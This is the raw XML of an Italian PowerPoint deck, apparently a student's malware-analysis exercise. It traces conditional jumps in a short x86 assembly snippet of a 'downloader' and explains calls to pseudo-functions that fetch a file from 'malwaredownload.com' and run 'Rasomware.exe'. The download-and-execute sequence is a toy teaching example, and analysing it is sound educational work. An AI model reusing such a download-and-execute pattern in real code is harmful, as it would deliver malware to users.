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7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273" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="62" d="100"/>
          <a:sy n="62" d="100"/>
        </p:scale>
        <p:origin x="10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E5C3-88EC-41BE-BD22-269DBB45AD95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54FE-E86D-40FE-8F57-54508758A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74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89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1pPr>
    <a:lvl2pPr marL="434477" algn="l" defTabSz="8689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2pPr>
    <a:lvl3pPr marL="868954" algn="l" defTabSz="8689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3pPr>
    <a:lvl4pPr marL="1303431" algn="l" defTabSz="8689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4pPr>
    <a:lvl5pPr marL="1737909" algn="l" defTabSz="8689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5pPr>
    <a:lvl6pPr marL="2172386" algn="l" defTabSz="8689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6pPr>
    <a:lvl7pPr marL="2606863" algn="l" defTabSz="8689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7pPr>
    <a:lvl8pPr marL="3041340" algn="l" defTabSz="8689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8pPr>
    <a:lvl9pPr marL="3475817" algn="l" defTabSz="8689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84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44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1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93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6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49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0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4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46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44C0-9A1A-4586-91F7-BC234E74E1BF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9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036E3-BC35-1903-5B0E-84D13138D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68695"/>
            <a:ext cx="12192000" cy="41206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4800" dirty="0"/>
              <a:t>Progetto</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1869" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="it-IT" sz="1869" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t>Spiegazione di quale salto condizionale effettua il malware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Disegnare un diagramma identificando i salti condizionali: con una linea verde i salti effettuati, con una linea rossa quelli non effettuati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Diverse funzionalità implementate all’interno del malware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Con riferimento alle istruzioni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" i="1" dirty="0"/>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
              <a:t> presenti nelle tabelle 2 e 3, dettagliare come sono passati gli argomenti alle successive chiamate di funzione</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="2000" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="it-IT" sz="2000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F93219-DE49-C120-C3C5-83C9F79D1535}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9825788" y="6123466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Orlando Tangari</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="175732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99D156-59DB-9A9A-C26C-731A669FA27B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56142">
              <a:defRPr/>
            </a:pP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Il malware , di tipo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>downloader</a:t>
            </a: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, effettua un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>jump</a:t>
            </a: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 in tabella 3, con istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>jz</a:t>
            </a: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, perché, viene inizializzato EAX a 5 ed EBX a 10, si esegue l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a: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 per verificare se il valore EAX-5 faccia 0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="356142">
              <a:defRPr/>
            </a:pP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Visto che l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>jnz</a:t>
            </a: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 ha un risultato negativo, si prosegue con le successive righe di codice, dove viene incrementato EBX di 1 e la seconda istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1200" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmp</a:t>
            </a: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 verifica il valore uguale a 0.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E8DA0D-21BC-660B-16FA-2A92E27AA45A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="429531"/>
            <a:ext cx="919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6142">
              <a:defRPr/>
            </a:pP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Tabella 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A632C6-77ED-01B7-3C05-1C23F942CC77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="706530"/>
            <a:ext cx="8348426" cy="229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00401040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mov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EAX, 5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00401044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mov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EBX, 10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00401048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cmp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EAX, 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" i="1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                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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0040105B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jnz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loc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0040BBA0                    ; tabella 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" i="1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                                                                                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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0040105F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inc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EBX                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                                                      </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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00401064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cmp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EBX, 11                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                                              </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1100" i="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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00401068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jz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loc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0040FFA0                     ; tabella 3</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="9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41F617-71FA-9ED2-E321-6BA1B013721D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="3724212"/>
            <a:ext cx="8348426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0040BBA0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mov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EAX, EDI                               EDI=malwaredownload.com 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                                                                    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0040BBA4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push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EAX                                       ; URL                                   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                                                     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0040BBA8                             call            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DownloadToFile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()              ; pseudo funzione                                        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C1D2A2-4A54-262E-CCC2-E5208CB8CFE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="3447213"/>
            <a:ext cx="919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6142">
              <a:defRPr/>
            </a:pP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Tabella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D02C93-677E-C52B-C466-E9BF3D593DD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="5353441"/>
            <a:ext cx="8348426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0040FFA0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mov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EDX, EDI                              EDI:C:\Program and Settings\Local User\Desktop\Rasomware.exe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                                                                    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0040FFA4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push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EDX                                       ; .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exe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da eseguire                                   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                                                              </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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0040FFA8                             call                                          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>WinExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>()                            ; pseudo funzione                                     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A70208-C3E3-38E4-C84A-AEF404C29D48}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1921787" y="5076442"/>
            <a:ext cx="9198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56142">
              <a:defRPr/>
            </a:pP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Tabella 3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16094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E9B010AB-347E-1392-4B62-4C457F5B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93" y="1298273"/>
            <a:ext cx="7098414" cy="196603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471FD2A-7BB3-9936-F8AA-DA17DCC5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3" y="4259479"/>
            <a:ext cx="5212507" cy="607873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8197747D-EAFD-51D5-290F-BB8EEC85E084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3465095" y="3670433"/>
            <a:ext cx="185979" cy="4184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4F1A7D1-7228-8660-C209-AAA6BD83EB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3560319" y="3670433"/>
            <a:ext cx="2358839" cy="95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54E9BAC-21A2-0111-86B1-336535709352}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5647937" y="3494437"/>
            <a:ext cx="447218" cy="952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800CB46A-0351-6753-89E5-C5C2B3517817}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8540928" y="3670432"/>
            <a:ext cx="185979" cy="37348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59F215A-98EA-FB49-E6C7-93E92DB4A71B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6318764" y="3670433"/>
            <a:ext cx="2339204" cy="952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FF07CEB-4F9E-9083-76CA-C2453D202273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6142767" y="3495401"/>
            <a:ext cx="447218" cy="95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EBB8FCEE-7AA1-3A49-E362-255345DA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262" y="4266507"/>
            <a:ext cx="5212508" cy="6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99D156-59DB-9A9A-C26C-731A669FA27B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"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6142"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Funzionalità implementate all’interno del malware:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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DownloadToFile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(): API per scaricare bit da internet e salvarli all’interno di un file sul disco rigido del computer infetto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                                In fase di analisi, attraverso questa API, si può identificare un download.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pP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356142"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WinExec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():  API per creare la funzione di un processo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                    Il 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downloader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, dopo aver scaricato il software dannoso, procede al suo avvio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pP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356142">
              <a:defRPr/>
            </a:pP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356142"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Riferimento istruzioni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>call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tabelle 2 e 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>argomenti passati alle successive chiamate di funzione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2000" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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Tabella 2: attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>mov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, il 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downloader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, copia il contenuto del registro EDI, cioè un URL malevolo, nel registro EAX. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                 Attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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inserisce in cima allo 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stack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di memoria il registro EAX, per far collegare il PC vittima all’URL malevolo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                 Attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>call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si chiama la funzione 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DownloadToFile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(), per scaricare il software dannoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pP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356142"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Tabella  3: attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>mov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, il 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downloader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, copia il contenuto del registro EDI nel registro EDX, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                  ovvero il percorso di destinazione del software dannoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                  Attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="16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inserisce in cima allo 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stack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di memoria il registro EDX, l’eseguibile del software dannoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142"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                  Attraverso l’istruzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>call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 si chiama la funzione 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WinExec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(), per avviare il software dannoso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="356142">
              <a:defRPr/>
            </a:pP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3513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4188</TotalTime>
  <Words>479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Progetto  Spiegazione di quale salto condizionale effettua il malware  Disegnare un diagramma identificando i salti condizionali: con una linea verde i salti effettuati, con una linea rossa quelli non effettuati  Diverse funzionalità implementate all’interno del malware  Con riferimento alle istruzioni call presenti nelle tabelle 2 e 3, dettagliare come sono passati gli argomenti alle successive chiamate di funzione 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Policy per Ping da Kali Linux a Windows 7  Utilizzo dell’utility INetSim per emulazione di servizi Internet  Cattura dei pacchetti tramite WireShark</dc:title>
  <dc:creator>Utente</dc:creator>
  <cp:lastModifiedBy>Utente</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-10-27T14:34:40Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-20T17:05:34Z</dcterms:modified>
</cp:coreProperties>
</file>